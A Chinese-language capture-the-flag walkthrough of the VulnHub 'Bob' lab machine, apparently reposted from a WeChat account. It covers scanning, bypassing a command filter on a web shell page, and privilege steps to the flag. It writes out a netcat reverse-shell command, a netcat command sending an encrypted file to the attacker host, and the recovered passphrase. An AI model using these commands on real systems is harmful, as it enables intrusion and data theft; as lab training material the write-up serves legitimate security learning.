轉載自公衆號:alisrc
題記
最近在打靶機,發現了一個挺有意思又挺有技巧性的靶機,這裏想跟大家分享一下,各位大佬輕噴。
環境準備
https://download.vulnhub.com/bob/Bob_v1.0.1.ova (靶機下載地址)
攻擊機 Kali IP 192.168.107.129
靶機在同一C段下
主機發現
使用命令nmap -sP 192.168.107.1/24
192.168.107.1是我物理機的ip,
而192.168.107.254是結束ip。
所以說我們的靶機ip就是192.168.107.132.
端口掃描
使用命令nmap -sS 192.168.107.132
我們發現只開放了一個web 80端口,我們訪問。
上面雖說有Home之類的選項。但是點不動的,沒用。所以說web頁面上沒什麼搞頭,所以我們從目錄下手
目錄掃描
這裏我使用御劍掃描,可以看到,掃出來了robots.txt
訪問,看到如下幾個根目錄。依次訪問一下。login.php直接是404。passwords.html是
lat_memo.html是
這兩個頁面都沒什麼有用的信息。接下來是dev_shell.php。這纔是本次靶機的突破口。
尋找突破口
一開始,我天真的以爲這是一個後面。。。拿起burp就去爆破密碼,半天爆不出來。再回頭來看,發現有個Output。想一想會不會是一個執行命令的。試一試
果然,執行了命令,當我使用ls時,
頁面沒有了回顯。於是我推測,應該是ls被禁用了,但是不要忘了,ls還有個加強版的命令(也不能說是加強版,理解意思就行)。lsattr,我們試一試,
沒用過濾,這下可以看到很多有用的東西。比如說這個./dev_shell_php.bak,這很明顯是個源碼泄露,我們把源碼DOWN下來。
看到上面過濾了一些命令,其中包括我們可能用到的ls,nc,cat。 其實這樣也可以一步一步進行信息的蒐集
但是,每次都要輸這麼多,顯然是很麻煩的。所以我想反彈一個shell到我的攻擊機上。但是nc都被禁了,這裏用了很多方式,最後發現這種方式能夠繞過,直接去/bin裏使用命令,比如我使用cat使用命令/bin/cat robots.txt
獲取會話
知道怎麼繞過nc,接下來就是獲得會話了,首先在我的攻擊機上使用命令nc -lvp 4444,接着在執行命令界面使用 /bin/nc -e /bin/sh 192.168.107.1 4444。然後,成功獲取會話。
whoami 可以看到我們目前的權限。爲了美化一下界面,產生一個TTY Shell 使用python -c 'import pty;pty.spawn("/bin/bash")'。
接着ls看下目錄下的文件,有個flag.txt,應該是沒權限查看的
獲得密碼
進入home目錄,查看一下有哪些用戶。
先看bob吧,
可以看到兩個文件和一個目錄,那個login.txt.gpg是gpg加密的,需要密碼,所以,現在的目標,就是要搞到密碼。同目錄下還有個Secret,跟進去看看。
這個地方,需要有某種常識。。。這個地方也是卡了半天。。
就是這個,可以發現就是個所謂的“藏頭詩”
這也是比較有意思的,不知道確實就真的不知道了。。所以,密碼自然就是這個每一句的開頭了。然後我們使用命令解密gpg --batch --passphrase HARPOCRATES -d login.txt.gpg。結果還是沒法
這裏又卡了半天,我是這樣做的👉:用nc將該文件轉發到我的攻擊機上,再用gpg解密。
先在攻擊機上nc -lvp 1235 > login.txt.gpg。意思是接收的文件是login.txt.gpg
在靶機上先切換到/home/bob/Documents下,
接着使用命令nc -w 3 192.168.107.129 1235 < login.txt.gpg。
接着ctrl c結束,查看
已經被轉移過來了,然後,再次使用解密命令解密。
解密成功。獲得了bob的密碼。
Get flag
登陸bob的賬號。su bob。然後我直接sudo cat flag.txt。就得到了flag